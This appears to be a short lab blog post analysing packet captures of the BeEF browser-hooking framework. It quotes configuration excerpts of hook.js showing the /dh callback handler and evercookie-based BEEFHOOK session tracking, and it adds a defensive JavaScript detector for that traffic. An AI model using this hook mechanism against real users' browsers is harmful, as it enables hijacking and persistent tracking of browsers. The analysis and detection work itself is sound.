A Brief Analysis of BeEF Packet Captures
Date: 2023-07-09

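After setting up BeEF, I wanted to capture some traffic and take a quick look at it.

This is the first packet; follow its stream.

The response is the demo page, and it contains a script.

window.location.protocol is the protocol (http) and window.location.host is the host plus port number; the line underlined in red loads http://host:3000/hook.js.

Continuing to follow the stream, the browser sends a GET request for hook.js.

Continue following the stream.

The response is hook.js.

This is the code of hook.js.

There is quite a lot of it... I can't understand it.

Following the packets further, there is a request that submits parameters.

Search hook.js for dh to find what it does: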

```javascript
/*!
 * @literal object: beef.net
 *
 * Provides basic networking functions,
 * like beef.net.request and beef.net.forgeRequest,
 * used by BeEF command modules and the Requester extension,
 * as well as beef.net.send which is used to return commands
 * to BeEF server-side components.
 *
 * Also, it contains the core methods used by the XHR-polling
 * mechanism (flush, queue)
 */
beef.net = {

    host: "192.168.170.132",
    port: "3000",
    hook: "/hook.js",
    httpproto: "http",
    handler: '/dh',
    chop: 500,
    pad: 30, //this is the amount of padding for extra params such as pc, pid and sid
    sid_count: 0,
    cmd_queue: [],

    // ... (excerpt; the remaining members of beef.net are not shown)
};
```

Continuing to trace,

search hook.js for BEEFHOOK:

```javascript
/*!
 * @literal object: beef.session
 *
 * Provides basic session functions.
 */
beef.session = {

    hook_session_id_length: 80,
    hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
    ec: new evercookie(),
    beefhook: "BEEFHOOK",

    /**
     * Gets a string which will be used to identify the hooked browser session
     *
     * @example: var hook_session_id = beef.session.get_hook_session_id();
     */
    get_hook_session_id: function() {
        // check if the browser is already known to the framework
        var id = this.ec.evercookie_cookie(beef.session.beefhook);
        if (typeof id == 'undefined') {
            var id = this.ec.evercookie_userdata(beef.session.beefhook);
        }
        if (typeof id == 'undefined') {
            var id = this.ec.evercookie_window(beef.session.beefhook);
        }

        // if the browser is not known create a hook session id and set it
        if ((typeof id == 'undefined') || (id == null)) {
            id = this.gen_hook_session_id();
            this.set_hook_session_id(id);
        }

        // return the hooked browser session identifier
        return id;
    },

    // ... (excerpt; the remaining members of beef.session are not shown)
};
```

The packets after that just keep repeating the last two requests.
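As an added example (not part of the original post and not BeEF's own code), the identifiers visible in the hook.js excerpts above can be turned into a simple traffic check: fetches of `/hook.js`, callbacks to the `/dh` handler, and a `BEEFHOOK` value of 80 alphanumeric characters. The record layout, the sample requests, and the assumption that `BEEFHOOK` travels as a query parameter or cookie are constructed for illustration.

```javascript
// Added example: flag BeEF hook traffic in parsed HTTP request records.
const HOOK_PATH = "/hook.js";     // beef.net.hook
const HANDLER_PATH = "/dh";       // beef.net.handler
const SESSION_NAME = "BEEFHOOK";  // beef.session.beefhook
// hook_session_id_length is 80 and hook_session_id_chars is A-Z, a-z, 0-9
const SESSION_ID_RE = /^[A-Za-z0-9]{80}$/;
// Look for the session value in the query string, then in the Cookie header
// (assumption: these are the two places it can appear on the wire).
function findSessionId(url, cookieHeader) {
  const fromQuery = url.searchParams.get(SESSION_NAME);
  if (fromQuery !== null) return fromQuery;
  for (const part of (cookieHeader || "").split(";")) {
    const [name, ...rest] = part.split("=");
    if (name.trim() === SESSION_NAME && rest.length) return rest.join("=").trim();
  }
  return null;
}
// Return the list of indicators one request matches (empty list = no match).
function classifyRequest(req) {
  const url = new URL(req.path, `http://${req.host}`);
  const reasons = [];
  if (url.pathname === HOOK_PATH) reasons.push("hook-script-fetch");
  if (url.pathname === HANDLER_PATH) reasons.push("handler-callback");
  const sid = findSessionId(url, req.cookie);
  // A value that is not 80 alphanumerics is still worth a look, but weaker.
  if (sid !== null) reasons.push(SESSION_ID_RE.test(sid) ? "session-id" : "session-name-only");
  return reasons;
}
// Group matched indicators by destination host:port.
function summarize(requests) {
  const byHost = new Map();
  for (const req of requests) {
    const reasons = classifyRequest(req);
    if (reasons.length === 0) continue;
    const seen = byHost.get(req.host) || new Set();
    reasons.forEach((r) => seen.add(r));
    byHost.set(req.host, seen);
  }
  return byHost;
}
// Constructed sample records; the host is the one shown in beef.net above.
const SID = "Ab3".repeat(26) + "Zz"; // 80 characters
const sample = [
  { host: "192.168.170.132:3000", path: `/hook.js?BEEFHOOK=${SID}`, cookie: "" },
  { host: "192.168.170.132:3000", path: "/dh", cookie: `theme=dark; BEEFHOOK=${SID}` },
  { host: "example.test", path: "/index.html", cookie: "theme=dark" },
];
console.log([...summarize(sample)].map(([h, r]) => `${h}: ${[...r].join(", ")}`).join("\n"));
```

Because the post observes that the same two requests repeat continuously, a host that keeps matching both path indicators over time is a stronger signal than a single hit.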

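Try out one of the features at random.

Result:

Look at the packets.

After one of the requests for hook.js, something changes.

The corresponding packet:

You can see the attack parameters I filled in.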
